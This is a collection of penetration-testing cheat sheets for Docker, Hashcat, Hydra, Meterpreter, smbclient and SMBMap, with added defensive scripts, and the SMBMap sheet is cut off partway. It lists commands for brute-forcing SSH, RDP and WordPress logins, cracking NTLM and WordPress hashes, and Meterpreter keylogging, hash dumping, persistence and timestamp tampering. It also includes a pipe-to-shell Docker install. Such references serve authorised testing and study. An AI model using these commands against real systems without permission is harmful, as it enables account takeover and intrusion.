├── Docker Cheat Sheet.md
├── Hashcat Cheat Sheet.md
├── Hydra Cheat Sheet.md
├── Meterpreter cheat sheet.md
├── README.md
├── SMBClient Cheat Sheet.md
├── SMBMap Cheat Sheet.md
├── Tshark_CheatSheet.md
├── ffuf Cheat Sheet.md
└── nmap Cheat Sheet.md

/Docker Cheat Sheet.md:
--------------------------------------------------------------------------------
# Docker Cheat Sheet
*Containerization Made Simple*

---

## **1. Core Concepts**
- **Image**: Immutable template with app code, dependencies, and config.
- **Container**: Isolated runtime instance of an image.
- **Dockerfile**: Blueprint to automate image builds.
- **Registry**: Hub for storing/sharing images (e.g., Docker Hub, ECR).
- **Volume**: Persistent storage for containers.
- **Network**: Communication channel between containers/host.

---

## **2. Installation**

### **Linux**
```bash
curl -fsSL https://get.docker.com | sh
sudo usermod -aG docker $(whoami) && newgrp docker
```

### **macOS/Windows**
- Install [Docker Desktop](https://www.docker.com/products/docker-desktop).

### **Verify**
```bash
docker version          # Check client/server versions
docker run hello-world  # Run a test container
```

---

## **3. Image Management**

| **Command** | **Description** |
|---|---|
| `docker images` | List local images |
| `docker pull <image>:<tag>` | Download image from registry |
| `docker rmi <image>` | Remove image |
| `docker build -t <name>:<tag> .` | Build image from Dockerfile |
| `docker image prune -a` | Delete unused images |

**Example**:
```bash
docker pull nginx:alpine     # Lightweight Nginx image
docker build -t myapp:1.0 .  # Build from current directory's Dockerfile
```

**Note**:
- Use `:<tag>` (e.g., `:latest`, `:alpine`) to specify image versions.
- `docker image prune -a` removes **all** unused images, not just dangling ones.

---

## **4. Container Lifecycle**

| **Command** | **Description** |
|---|---|
| `docker run -d --name <name> <image>` | Run container in background |
| `docker start/stop/restart <container>` | Manage container state |
| `docker rm -f <container>` | Force remove running container |
| `docker exec -it <container> sh` | Open interactive shell |
| `docker logs -f <container>` | Tail container logs |
| `docker ps -a` | List all containers (including stopped) |

**Common Flags**:
- `-p 8080:80`: Map host port 8080 → container port 80.
- `-v /host/path:/container/path`: Bind mount volume.
- `-e VAR=value`: Set environment variable.
- `--network mynet`: Attach to custom network.

**Example**:
```bash
docker run -d --name webserver -p 8080:80 -v ./html:/usr/share/nginx/html nginx:alpine
```

**Explanation**:
- `-d`: Run in detached mode (background).
- `-v ./html:/usr/share/nginx/html`: Mount the local `html` folder into the container's Nginx directory.

---

## **5. Dockerfile Essentials**

### **Sample Dockerfile**
```dockerfile
FROM python:3.9-slim                                 # Base image
WORKDIR /app                                         # Set working directory
COPY requirements.txt .                              # Copy dependencies file
RUN pip install --no-cache-dir -r requirements.txt   # Install deps
COPY . .                                             # Copy app code
EXPOSE 5000                                          # Declare port
CMD ["gunicorn", "--bind", "0.0.0.0:5000", "app:app"]  # Runtime command
```

### **Multi-Stage Build**
```dockerfile
# Build stage (heavy, includes build tools)
FROM node:18 as builder
WORKDIR /app
COPY package*.json ./
RUN npm install
COPY . .
RUN npm run build   # Compile app

# Production stage (lightweight, only necessary files)
FROM nginx:alpine
COPY --from=builder /app/dist /usr/share/nginx/html   # Copy built files
```

**Build & Run**:
```bash
docker build -t myapp:1.0 .
docker run -d -p 80:80 myapp:1.0
```

**Note**:
- Multi-stage builds reduce image size by discarding build tools in the final image.
- `--from=builder` copies files from the earlier build stage.

---

## **6. Networking**

| **Command** | **Description** |
|---|---|
| `docker network ls` | List networks |
| `docker network create mynet` | Create custom network |
| `docker network inspect mynet` | Show network details |

**Example**:
```bash
docker network create app_network
docker run -d --network app_network --name frontend nginx
docker run -d --network app_network --name backend api:latest
```

**Explanation**:
- Containers on the same network can communicate using their service names (e.g., `frontend` can ping `backend`).

---

## **7. Volumes & Storage**

| **Command** | **Description** |
|---|---|
| `docker volume create myvol` | Create named volume |
| `docker volume ls` | List volumes |
| `docker run -v myvol:/data ...` | Mount volume |

**Example**:
```bash
docker run -d --name db -v pgdata:/var/lib/postgresql/data postgres:15
```

**Note**:
- Volumes persist data even if the container is deleted.
- Use `-v pgdata:/var/lib/postgresql/data` to store PostgreSQL data permanently.

---

## **8. Docker Compose**

### **Sample `docker-compose.yml`**
```yaml
version: '3.8'
services:
  web:
    image: nginx:alpine
    ports:
      - "80:80"
    volumes:
      - ./html:/usr/share/nginx/html   # Bind mount for static files
  db:
    image: postgres:15
    environment:
      POSTGRES_PASSWORD: secret        # Set DB password
    volumes:
      - pgdata:/var/lib/postgresql/data   # Persistent volume

volumes:
  pgdata:   # Define named volume
```

| **Command** | **Description** |
|---|---|
| `docker compose up -d` | Start services in background |
| `docker compose down` | Stop and remove containers/volumes |
| `docker compose logs -f` | Follow service logs |

**Explanation**:
- `docker compose up -d` reads the `docker-compose.yml` file and starts all defined services.
- Named volumes (e.g., `pgdata`) are managed automatically.

---

## **9. Advanced Techniques**

### **Resource Limits**
```bash
docker run -d --name app --memory=512m --cpus=1.5 myapp:1.0
```
**Note**:
- Restrict memory (`--memory`) and CPU (`--cpus`) to prevent a container from hogging resources.

### **Health Checks**
```dockerfile
HEALTHCHECK --interval=30s --timeout=3s \
  CMD curl -f http://localhost:5000/health || exit 1
```
**Note**:
- Docker periodically runs this check to verify the app is healthy.
- Use `docker inspect <container>` to see health status.

### **Security Best Practices**
1. Avoid `root` user in containers:
   ```dockerfile
   FROM node:18
   USER node   # Run as non-root "node" user
   ```
2. Scan for vulnerabilities:
   ```bash
   docker scan myapp:1.0   # Uses Snyk to find CVEs
   ```

---

## **10. Maintenance & Optimization**

| **Command** | **Description** |
|---|---|
| `docker system prune -a --volumes` | Remove unused images/containers/volumes |
| `docker stats` | Live resource usage monitor |
| `docker history <image>` | Inspect image layers |

**Tips**:
- Use `.dockerignore` to exclude unnecessary files (e.g., `node_modules`, `.git`).
- Tag images semantically: `myapp:1.0-prod`.

---

## **11. Troubleshooting**

| **Issue** | **Solution** |
|---|---|
| Port conflicts | Check running containers: `docker ps` |
| Permission denied | Use `-v $(pwd):/data:ro` for read-only mounts |
| Container won't start | Inspect logs: `docker logs <container>` |
| Image too large | Use multi-stage builds and Alpine-based images |

---
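The practices in sections 5 and 9 (pinned base image, non-root `USER`, a `HEALTHCHECK`, no credentials baked into the image) are easy to state and easy to forget. The script below is an added example, not part of the cheat sheet: a minimal Dockerfile policy check in POSIX `sh` with `grep` and `awk`, run against two constructed Dockerfiles. The check names (`dockerfile_lint`) and the sample Dockerfiles are this example's own; the exit status equals the number of findings so it can gate a CI build.

```shell
#!/bin/sh
# Added example, not part of the cheat sheet: a minimal Dockerfile policy check
# for the practices in sections 5 and 9 (pinned base image, non-root USER,
# HEALTHCHECK, no credentials baked in via ENV/ARG). POSIX sh + grep/awk only.
# Usage: dockerfile_lint <Dockerfile>  -> one finding per line; exit status = number of findings

dockerfile_lint() {
    file="$1"
    findings=0

    # A FROM without a tag, or tagged :latest, rebuilds differently over time.
    if grep -Ei '^FROM[[:space:]]+[^ :]+([[:space:]]|$)|^FROM[[:space:]]+[^ ]+:latest([[:space:]]|$)' "$file" >/dev/null; then
        echo "FROM: base image is unpinned (no tag or :latest)"
        findings=$((findings + 1))
    fi

    # Only the last USER instruction applies to the final stage; absent or root means the app runs as root.
    last_user=$(grep -Ei '^USER[[:space:]]+' "$file" | tail -n 1 | awk '{print $2}')
    case "$last_user" in
        ""|root|root:*|0|0:*)
            echo "USER: final stage runs as root (add a non-root USER)"
            findings=$((findings + 1)) ;;
    esac

    # Without HEALTHCHECK, docker inspect reports no health state and a hung app looks fine.
    if ! grep -Ei '^HEALTHCHECK[[:space:]]' "$file" >/dev/null; then
        echo "HEALTHCHECK: none defined"
        findings=$((findings + 1))
    fi

    # ENV and ARG values persist in the image config/history, visible to anyone who can pull the image.
    if grep -Ei '^(ENV|ARG)[[:space:]]+[^ =]*(PASSWORD|SECRET|TOKEN|API_KEY)' "$file" >/dev/null; then
        echo "ENV/ARG: credential-looking variable baked into the image"
        findings=$((findings + 1))
    fi

    return "$findings"
}

# Two constructed Dockerfiles (not from the page): one careless, one following the sheet's advice.
WEAK=$(mktemp); HARDENED=$(mktemp)
trap 'rm -f "$WEAK" "$HARDENED"' EXIT
cat >"$WEAK" <<'EOF'
FROM node
WORKDIR /app
COPY . .
RUN npm install
ENV DB_PASSWORD=secret
CMD ["node", "server.js"]
EOF
cat >"$HARDENED" <<'EOF'
FROM node:18-alpine
WORKDIR /app
COPY package*.json ./
RUN npm ci --omit=dev
COPY . .
USER node
HEALTHCHECK --interval=30s --timeout=3s CMD wget -qO- http://localhost:3000/health || exit 1
CMD ["node", "server.js"]
EOF

echo "== weak Dockerfile ==";     dockerfile_lint "$WEAK"     || echo "-> $? finding(s)"
echo "== hardened Dockerfile =="; dockerfile_lint "$HARDENED" && echo "-> clean"
```

The checks are deliberately line-based heuristics: they catch the common mistakes without parsing every Dockerfile form (`HEALTHCHECK NONE`, `--platform` flags and custom charsets of build arguments are not handled), which is the right trade-off for a pre-commit hook that must never block on a parser bug.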
## **12. References**
- [Docker Documentation](https://docs.docker.com/)
- [Dockerfile Best Practices](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/)

---
--------------------------------------------------------------------------------
/Hashcat Cheat Sheet.md:
--------------------------------------------------------------------------------
# Hashcat Cheat Sheet

## **1. Basic Terminology**

- **Hash**: A fixed-size string generated by a hash function (e.g., MD5, SHA-256).
- **Hashcat**: A powerful password recovery tool that supports multiple hash types and attack modes.
- **Attack Modes**: Strategies used to crack hashes (e.g., brute-force, dictionary, hybrid).
- **Wordlist**: A file containing potential passwords or phrases for dictionary attacks.
- **Mask**: A pattern used in brute-force attacks to define the structure of passwords.

---
## **2. Basic Usage**

### General Syntax
```bash
hashcat [options] <hash|hashfile> [wordlist|mask]
```

### Common Options
| **Option** | **Description** |
|---|---|
| `-m <hash-type>` | Specify the hash type (e.g., `0` for MD5, `1000` for NTLM). |
| `-a <attack-mode>` | Specify the attack mode (e.g., `0` for dictionary, `3` for brute-force). |
| `-o <outfile>` | Save cracked hashes to a file. |
| `--show` | Show cracked hashes. |
| `--force` | Ignore warnings and force execution. |
| `-w <workload>` | Set workload profile (`1` for low, `2` for medium, `3` for high). |
| `-r <rulefile>` | Apply custom rules for wordlist mutation. |

---
## **3. Hash Types**

Common hash types and their corresponding `-m` values:
- **MD5**: `0`
- **SHA1**: `100`
- **SHA256**: `1400`
- **NTLM**: `1000`
- **bcrypt**: `3200`
- **Wordpress**: `400`
- **JWT**: `16500`

For a full list, run:
```bash
hashcat --help
```

---

## **4. Attack Modes**

### Dictionary Attack
```bash
hashcat -m 0 -a 0 hashes.txt wordlist.txt
```
- **Description**: Uses a wordlist to crack hashes.
- **Example**: Crack MD5 hashes using `rockyou.txt`.

### Combinator Attack
```bash
hashcat -m 0 -a 1 hashes.txt wordlist1.txt wordlist2.txt
```
- **Description**: Combines words from two wordlists.

### Mask Attack
```bash
hashcat -m 0 -a 3 hashes.txt ?l?l?l?l?l
```
- **Description**: Uses a mask to define password structure.
- **Common Masks**:
  - `?l`: Lowercase letters (`a-z`)
  - `?u`: Uppercase letters (`A-Z`)
  - `?d`: Digits (`0-9`)
  - `?s`: Special characters (`!@#$%^&*`)
  - `?a`: All characters (`?l?u?d?s`)

### Hybrid Attack
```bash
hashcat -m 0 -a 6 hashes.txt wordlist.txt ?d?d?d
```
- **Description**: Combines a wordlist with a mask (prefix or suffix).

### Rule-Based Attack
```bash
hashcat -m 0 -a 0 hashes.txt wordlist.txt -r rules/best64.rule
```
- **Description**: Applies rules to mutate words in the wordlist.

---
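What makes a mask cheap or expensive is its keyspace, the product of the charset sizes at each position, and that number is what a defender needs when deciding whether a password policy survives the mask and hybrid attacks above. The following is an added example, not part of the cheat sheet: a POSIX `sh` calculator for hashcat mask keyspace and worst-case run time. The function names (`mask_keyspace`, `hybrid_keyspace`, `mask_seconds`) and the 10 GH/s rate in the demo are this example's own assumptions; the charset sizes are hashcat's built-in definitions (`?l`/`?u` 26, `?d` 10, `?s` 33, `?a` 95, `?b` 256).

```shell
#!/bin/sh
# Added example, not part of the cheat sheet: compute the keyspace of a hashcat
# mask (section 4 above) and the worst-case time to exhaust it at a given rate,
# to judge whether a password policy survives a mask attack.
# Charset sizes are hashcat's built-ins: ?l=26 ?u=26 ?d=10 ?s=33 ?a=95 ?b=256.
# Any other character is a literal; "??" is a literal question mark.
# Custom charsets (?1..?4 defined with -1..-4) are not handled here.

mask_keyspace() {
    mask="$1"
    total=1
    while [ -n "$mask" ]; do
        case "$mask" in
            '?l'*|'?u'*) size=26  ; mask="${mask#??}" ;;
            '?d'*)       size=10  ; mask="${mask#??}" ;;
            '?s'*)       size=33  ; mask="${mask#??}" ;;
            '?a'*)       size=95  ; mask="${mask#??}" ;;
            '?b'*)       size=256 ; mask="${mask#??}" ;;
            '??'*)       size=1   ; mask="${mask#??}" ;;   # escaped literal '?'
            *)           size=1   ; mask="${mask#?}"  ;;   # plain literal character
        esac
        # Shell arithmetic is 64-bit signed; refuse to overflow silently (e.g. ten ?a positions).
        if [ "$total" -gt $((9223372036854775807 / size)) ]; then
            echo "keyspace exceeds 2^63-1" >&2
            return 1
        fi
        total=$((total * size))
    done
    echo "$total"
}

# Hybrid attack (-a 6 / -a 7): every word in the list is paired with every mask candidate.
hybrid_keyspace() {   # $1 = number of words in the list, $2 = mask
    ks=$(mask_keyspace "$2") || return 1
    echo $(( $1 * ks ))
}

# Worst-case seconds to exhaust a mask at $2 hashes per second.
mask_seconds() {
    ks=$(mask_keyspace "$1") || return 1
    echo $(( ks / $2 ))
}

# Demo: an assumed 10 GH/s for a fast unsalted hash; substitute your own `hashcat -b` figure.
RATE=10000000000
for m in '?d?d?d?d?d?d' '?l?l?l?l?l?l?l?l' '?u?l?l?l?l?d?d?s' '?a?a?a?a?a?a?a?a'; do
    printf '%-20s keyspace=%-20s worst case=%ss\n' "$m" "$(mask_keyspace "$m")" "$(mask_seconds "$m" "$RATE")"
done
```

The demo shows why the "6-digit PIN" example in the next section is instant while the eight-character `?u?l?l?l?l?d?d?s` pattern that many policies mandate still falls in under an hour at that rate: the policy shapes the mask, and the mask fixes the cost.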
## **5. Practical Examples**

### Crack MD5 Hashes
```bash
hashcat -m 0 -a 0 hashes.txt rockyou.txt
```

### Crack NTLM Hashes
```bash
hashcat -m 1000 -a 0 hashes.txt wordlist.txt
```

### Brute-Force 6-Digit PIN
```bash
hashcat -m 0 -a 3 hashes.txt ?d?d?d?d?d?d
```

### Crack bcrypt Hashes
```bash
hashcat -m 3200 -a 0 hashes.txt wordlist.txt -w 3
```

### Crack Wordpress Hashes
```bash
hashcat -m 400 -a 0 hashes.txt wordlist.txt
```

---

## **6. Advanced Techniques**

### Using Rules
```bash
hashcat -m 0 -a 0 hashes.txt wordlist.txt -r rules/best64.rule
```
- **Common Rules**:
  - `best64.rule`: A collection of 64 common mutation rules.
  - `dive.rule`: A more extensive rule set.

### Using Potfiles
- Hashcat stores cracked hashes in a potfile (`~/.hashcat/hashcat.potfile`).
- To view cracked hashes:
```bash
hashcat --show hashes.txt
```

### Distributed Cracking
- Use `--restore` to resume sessions across multiple machines.

### Optimizing Performance
- Use `-w` to adjust workload:
```bash
hashcat -m 0 -a 0 hashes.txt wordlist.txt -w 3
```
- Use `--force` to bypass warnings (not recommended for production).

---

## **7. Useful Tips**

- **Use GPU**: Hashcat is optimized for GPU cracking. Ensure your GPU drivers are installed.
- **Wordlists**: Use SecLists or rockyou.txt for common passwords.
- **Rules**: Experiment with rules to increase cracking efficiency.
- **Potfile**: Regularly check the potfile for cracked hashes.

---
## **8. References**

- Official Hashcat Website: [https://hashcat.net/hashcat/](https://hashcat.net/hashcat/)
- Hashcat Hash Types: [https://hashcat.net/wiki/doku.php?id=example_hashes](https://hashcat.net/wiki/doku.php?id=example_hashes)
- Hashcat Wiki: [https://hashcat.net/wiki/](https://hashcat.net/wiki/)
- SecLists GitHub: [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists)

---
--------------------------------------------------------------------------------
/Hydra Cheat Sheet.md:
--------------------------------------------------------------------------------
# Hydra Cheat Sheet
*Fast Network Login Cracker for Brute-Forcing Protocols*

---

## **1. Core Concepts**
- **Hydra**: Parallelized login cracker supporting 50+ protocols (SSH, HTTP, SMB, etc.).
- **Service Module**: Protocol-specific rules for authentication (e.g., `ssh`, `http-post-form`).
- **Wordlists**: Files like `rockyou.txt` or `SecLists` for usernames/passwords.
- **Brute-Force**: Testing credential combinations systematically.

---

## **2. Basic Syntax**
```bash
hydra [options] <target> <service> [module-specific-parameters]
```

---
## **3. Essential Flags**
| **Flag** | **Description** |
|---|---|
| `-l <user>` | Single username (e.g., `-l admin`) |
| `-L <file>` | Username wordlist (e.g., `-L users.txt`) |
| `-p <pass>` | Single password (e.g., `-p Password123`) |
| `-P <file>` | Password wordlist (e.g., `-P passwords.txt`) |
| `-s <port>` | Custom port (e.g., `-s 8080` for non-standard HTTP) |
| `-t <tasks>` | Parallel tasks (default: 16; max: 64) |
| `-v` / `-V` | Verbose mode (`-V` for real-time output) |
| `-f` | Stop after first valid login |
| `-e nsr` | Test `n` (null), `s` (same as user), `r` (reverse) |
| `-w <sec>` | Wait time between attempts (e.g., `-w 5`) |
| `-W <sec>` | Per-host delay (e.g., `-W 2` to avoid lockouts) |
| `-R` | Restore a previous session |
| `-x <min:max:charset>` | Brute-force mode (e.g., `-x 6:8:a1d` for 6-8 chars) |

---

## **4. Service Modules & Examples**
*Format*: `<service>`: `[module-specific parameters]`

**Common service modules:**
- **SSH**: `ssh`
- **FTP**: `ftp`
- **HTTP Forms**: `http[s]-{get|post}-form`
- **SMB**: `smb`
- **MySQL**: `mysql`
- **RDP**: `rdp`
- **SMTP**: `smtp`
- **WordPress**: `http-form-post` (custom module)

### **SSH**
**Module**: `ssh`
```bash
hydra -L users.txt -P passwords.txt 10.10.10.10 ssh -s 22 -t 64
```
**Notes**:
- Use `-t` to increase threads for faster cracking.

---

### **HTTP Form Login**
**Module**: `http[s]-post-form`
**Syntax**:
```
"/path:POST-data:F=Failure-string:S=Success-string"
```
**Example**:
```bash
hydra 10.10.10.10 http-post-form \
  "/login.php:user=^USER^&pass=^PASS^:F=Invalid credentials" -L users.txt -P passwords.txt
```
**Notes**:
- Use `:S=` to match success criteria (e.g., `S=302` for redirects).
- Add headers with `-H "Cookie: session=xyz"`.

---

### **SMB (Windows Shares)**
**Module**: `smb`
```bash
hydra -L users.txt -P passwords.txt 10.10.10.10 smb -W 3
```
**Notes**:
- Target specific shares: `smb://WORKGROUP\\C$`.

---

### **FTP**
**Module**: `ftp`
```bash
hydra -L users.txt -P passwords.txt ftp://10.10.10.10 -s 21 -V
```
**Anonymous Access**:
```bash
hydra -l anonymous -P "" ftp://10.10.10.10
```

---

### **MySQL**
**Module**: `mysql`
```bash
hydra -L users.txt -P passwords.txt 10.10.10.10 mysql -t 32
```

---

### **RDP (Remote Desktop)**
**Module**: `rdp`
```bash
hydra -L users.txt -P passwords.txt rdp://10.10.10.10 -V
```

---

### **SMTP**
**Module**: `smtp`
**Brute-force**:
```bash
hydra -L users.txt -P passwords.txt smtp://10.10.10.10
```
**Verify Emails (VRFY)**:
```bash
hydra -L users.txt smtp-vrfy://10.10.10.10
```

---

### **WordPress**
**Module**: `http-form-post` (custom)
```bash
hydra -l admin -P rockyou.txt 10.10.10.10 http-form-post \
  "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username"
```

---

## **5. Advanced Techniques**

### **Custom Headers & Proxies**
```bash
hydra -l admin -P passwords.txt 10.10.10.10 http-post-form \
  "/login:user=^USER^&pass=^PASS^:F=error" -H "X-Forwarded-For: 127.0.0.1" -x http://proxy:8080
```

### **Password Mutations**
Test variations like `admin123` or `Admin123`:
```bash
hydra -l admin -P passwords.txt -e nsr 10.10.10.10 ssh
```

### **Resume Sessions**
```bash
hydra -R
```

---
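The SSH runs in sections 3 to 5 have a mirror image on the target: a burst of `Failed password` lines from one client, many of them for accounts that do not exist. The script below is an added example, not part of the cheat sheet: a POSIX `sh`/`awk` check that counts failed SSH logins per source address over `auth.log`-style input and reports sources at or above a threshold, with the number of attempts against unknown users. The function name `failed_login_sources`, the threshold value and the log lines (documentation-range addresses) are constructed for this example; the line format is OpenSSH's standard `Failed password for [invalid user] <name> from <ip> port <n> ssh2`.

```shell
#!/bin/sh
# Added example, not part of the cheat sheet: the defender's view of the SSH
# brute force in sections 3 to 5. A parallel login cracker leaves a burst of
# "Failed password" lines from one source; this flags sources at or above a
# threshold and how many of their attempts targeted non-existent accounts.
# Usage: failed_login_sources THRESHOLD < /var/log/auth.log

failed_login_sources() {
    awk -v threshold="$1" '
        /sshd\[[0-9]+\]: Failed password for / {
            # The field after "from" is the client address, whether or not "invalid user" is present.
            for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i + 1); break }
            fails[ip]++
            if ($0 ~ /for invalid user /) invalid[ip]++
        }
        END {
            for (ip in fails)
                if (fails[ip] >= threshold)
                    printf "%d %s (invalid-user attempts: %d)\n", fails[ip], ip, invalid[ip] + 0
        }' | sort -rn
}

# Constructed sample log (documentation-range IPs, not real hosts).
AUTHLOG='Mar  3 10:00:01 bastion sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 51022 ssh2
Mar  3 10:00:01 bastion sshd[1202]: Failed password for invalid user test from 203.0.113.5 port 51023 ssh2
Mar  3 10:00:01 bastion sshd[1203]: Failed password for root from 203.0.113.5 port 51024 ssh2
Mar  3 10:00:02 bastion sshd[1204]: Failed password for root from 203.0.113.5 port 51025 ssh2
Mar  3 10:00:02 bastion sshd[1205]: Failed password for invalid user oracle from 203.0.113.5 port 51026 ssh2
Mar  3 10:00:02 bastion sshd[1206]: Failed password for root from 203.0.113.5 port 51027 ssh2
Mar  3 10:00:03 bastion sshd[1210]: Accepted publickey for deploy from 198.51.100.7 port 40022 ssh2
Mar  3 10:00:04 bastion sshd[1211]: Failed password for alice from 198.51.100.7 port 40030 ssh2'

printf '%s\n' "$AUTHLOG" | failed_login_sources 5
```

Six failures in two seconds from one address, half of them for usernames the host has never had, is the signature of a wordlist being replayed; the single failure from the other address is what a mistyped password looks like. The `-t 64` and `-w`/`-W` flags in the sections above change the rate of this burst, not its shape, so a per-source count over a sliding window remains the robust alert.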
## **6. Optimization & Safety**

### **Avoid Lockouts**
- Use `-w` and `-W` for delays:
```bash
hydra -l admin -P passwords.txt -w 5 -W 2 10.10.10.10 ssh
```

### **Performance**
- Increase threads: `-t 64`.
- Use smaller, targeted wordlists first.

### **Wordlists**
```bash
git clone https://github.com/danielmiessler/SecLists   # Comprehensive wordlists
```

---

## **7. Troubleshooting**

| **Issue** | **Solution** |
|---|---|
| "Too many connections" | Reduce threads (`-t 16`), add delays (`-w`/`-W`). |
| "Invalid module" | Check protocol syntax (e.g., `http-post-form`). |
| No results | Verify failure strings match responses. |

---

## **8. References**
- **Hydra GitHub**: https://github.com/vanhauser-thc/thc-hydra
- **SecLists**: https://github.com/danielmiessler/SecLists
--------------------------------------------------------------------------------
/Meterpreter cheat sheet.md:
--------------------------------------------------------------------------------
# Metasploit Meterpreter

## Basic Commands

- **help**: Show available meterpreter commands
- **sysinfo**: Display system information (OS, hostname, architecture)
- **ps**: List running processes (PID, name, user)
- **kill** `<pid>`: Terminate a process by PID
- **migrate** `<pid>`: Move meterpreter to another process (often a more stable one)
- **rev2self**: Revert the current process to its original user context

## File System Commands

- **ls**: List files in the current directory
- **cd** `<dir>`: Change the current directory to `<dir>`
- **pwd**: Show the current directory path
- **cat** `<file>`: Display the contents of `<file>`
- **download** `<file>`: Download `<file>` from the target
- **upload** `<file>`: Upload `<file>` from local to the target

## Network Commands

- **ipconfig**: Show network adapter configuration
- **route**: View or modify the routing table
- **netstat**: View active network connections
- **portfwd**: Forward a local port to a remote service (`portfwd add -l <lport> -p <rport> -r <rhost>`)
- **getsockname**: Display the socket name for the active connection

## User Management Commands

- **getuid**: Show the current user ID
- **ps**: List running processes with user ownership
- **getprivs**: List the current user's privileges
- **getsystem**: Attempt privilege escalation to SYSTEM

## Persistence Commands

- **persistence**: Enable persistent meterpreter access on the target
- **run** `<script>`: Execute a script (e.g., `run persistence -U -i <interval> -p <port> -r <host>`)

## Shell Commands

- **shell**: Open a command shell on the target
- **execute -f** `<cmd>`: Run a command on the target
- **background**: Background the current meterpreter session
- **Ctrl+Z**: Suspend/background the current session in console mode

## Other Commands

- **use** `<extension>`: Load a meterpreter extension
- **run** `<script>`: Execute a script or extension command
- **keyscan_start**: Start capturing keystrokes on the target
- **keyscan_dump**: Display captured keystrokes
- **screenshot**: Take a screenshot of the target's desktop
- **webcam_list**: List available webcams on the target
- **webcam_snap**: Capture a snapshot from a webcam
- **hashdump**: Dump local password hashes on the target
- **timestomp**: Alter file timestamps on the target to evade detection
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Cheat sheets

I hope that will help at least one of you out there.

--------------------------------------------------------------------------------
/SMBClient Cheat Sheet.md:
--------------------------------------------------------------------------------
# smbclient Cheat Sheet

## **1. Basic Terminology**
- **SMB (Server Message Block)**: Protocol for file sharing, printers, and network communication.
- **smbclient**: Command-line tool to interact with SMB shares (similar to FTP).
- **Share**: A network folder or resource exposed via SMB (e.g., `C$`, `Documents`).
- **Workgroup/Domain**: Network group for shared resources (default: `WORKGROUP`).

---

## **2. Basic Usage**

### General Syntax
```bash
smbclient [options] //<server>/<share>
```
Replace `server` with the name or IP address of the server hosting the file share, and `share` with the name of the file share.

You will be prompted for your username and password for the file share. Once authenticated, you will be presented with a command prompt where you can enter various commands to interact with the file share.

### Common Options
| **Option** | **Description** |
|---|---|
| `-U <user>[%pass]` | Username and password (e.g., `-U admin%Password123`). |
| `-W <workgroup>` | Workgroup/domain name (default: `WORKGROUP`). |
| `-I <ip>` | Server IP address (bypasses DNS). |
| `-p <port>` | Custom port (default: 445 for SMB over TCP/IP). |
| `-N` | No password prompt (use with empty or guest access). |
| `-E` | Hide password prompt output. |
| `-c <command>` | Execute a command non-interactively (e.g., `-c 'ls'`). |
| `-A <authfile>` | Load credentials from a file (format: `username = admin`, `password = pass`). |
| `-m <protocol>` | Set max SMB protocol (e.g., `-m SMB3`). |
| `-d <level>` | Debug verbosity (0-10). |

---
## **3. Interactive Commands**

Once connected, use these commands:

| **Command** | **Description** |
|---|---|
| `ls` | List files/directories. |
| `cd <dir>` | Change directory. |
| `get <file>` | Download a file. |
| `put <file>` | Upload a file. |
| `mget <pattern>` | Download multiple files (e.g., `mget *.txt`). |
| `mput <pattern>` | Upload multiple files. |
| `rm <file>` | Delete a file. |
| `mkdir <dir>` | Create a directory. |
| `rmdir <dir>` | Delete a directory. |
| `pwd` | Print current directory. |
| `recurse` | Toggle recursive mode for `mget`/`mput`. |
| `mask <pattern>` | Set a file filter (e.g., `mask *.docx`). |
| `tar` | Create/extract tar backups (e.g., `tar c backup.tar *`). |
| `exit` | Quit smbclient. |

---

## **4. Practical Examples**

### **Connection**
**Anonymous/Guest Access:**
```bash
smbclient //192.168.1.10/public -N
```

**Authenticated Access:**
```bash
smbclient //192.168.1.10/C$ -U admin%Password123
```

**Specify Domain/Workgroup:**
```bash
smbclient //SERVER/Share -W CORP -U user%pass
```

---

### **File Operations**
**Download a File:**
```bash
smbclient //192.168.1.10/Data -U user%pass -c "get report.docx"
```

**Upload All TXT Files:**
```bash
smbclient //192.168.1.10/Data -U user%pass -c "mask *.txt; recurse; mput *.txt"
```

**Delete a File:**
```bash
smbclient //192.168.1.10/Data -U user%pass -c "rm oldfile.zip"
```

---

### **Directory Management**
**Create a Directory:**
```bash
smbclient //192.168.1.10/Data -U user%pass -c "mkdir Projects"
```

**Recursive Download:**
```bash
smbclient //192.168.1.10/Data -U user%pass -c "recurse; prompt; mget *"
```

---

### **Non-Interactive Mode**
**List Shares via Script:**
```bash
smbclient -L 192.168.1.10 -U admin%Password123 -N -I 192.168.1.10
```

**Backup Directory to Tar:**
```bash
smbclient //192.168.1.10/Backup -U user%pass -c "tar c backup.tar Documents"
```

---

## **5. Advanced Techniques**

### **Mounting Shares**
Use `mount.cifs` (Linux) or `net use` (Windows) for persistent access:
```bash
sudo mount -t cifs //192.168.1.10/Data /mnt/share -o user=admin,pass=Password123
```

### **Brute-Force Share Names**
Combine with tools like `nmap` or `enum4linux`:
```bash
enum4linux -S 192.168.1.10
```

### **Using a Credentials File**
Create `creds.txt`:
```ini
username = admin
password = Password123
domain = CORP
```
Then:
```bash
smbclient //192.168.1.10/C$ -A creds.txt
```

---

## **6. Troubleshooting**

- **Connection Refused**: Check firewall rules, SMB port (445/139), and service status.
- **Access Denied**: Verify credentials, share permissions, and user privileges.
- **Protocol Errors**: Use `-m SMB2` or `-m SMB3` to enforce protocol version.

---

## **7. References**
- [smbclient Man Page](https://www.samba.org/samba/docs/current/man-html/smbclient.1.html)
--------------------------------------------------------------------------------
/SMBMap Cheat Sheet.md:
--------------------------------------------------------------------------------
# SMBMap Cheat Sheet

## **1. Basic Terminology**
- **SMBMap**: A tool to enumerate SMB shares, permissions, and perform file operations across Windows domains.
- **SMB (Server Message Block)**: Protocol for shared access to files, printers, and ports.
- **Share**: A network folder or resource exposed over SMB (e.g., `C$`, `ADMIN$`).
- **Null Session**: Connecting to SMB without credentials (often restricted in modern systems).

---
## **2. Basic Usage**

### General Syntax
```bash
smbmap [options] -H <ip>
```

### Common Flags
| **Flag** | **Description** |
|---|---|
| `-H <ip>` | Target IP address |
| `-u <user>` | Username (use `-u ''` for null session) |
| `-p <pass>` | Password |
| `-d <domain>` | Domain/workgroup (use `.` for local workgroup) |
| `-s <share>` | Specific share to target |
| `-P <port>` | Custom SMB port (default: 445) |
| `-x <command>` | Execute a command on the target |
| `-R` | Recursive directory listing (with read permissions) |
| `--download <path>` | Download a file from the share |
| `--upload <src> <dst>` | Upload a file to the share |
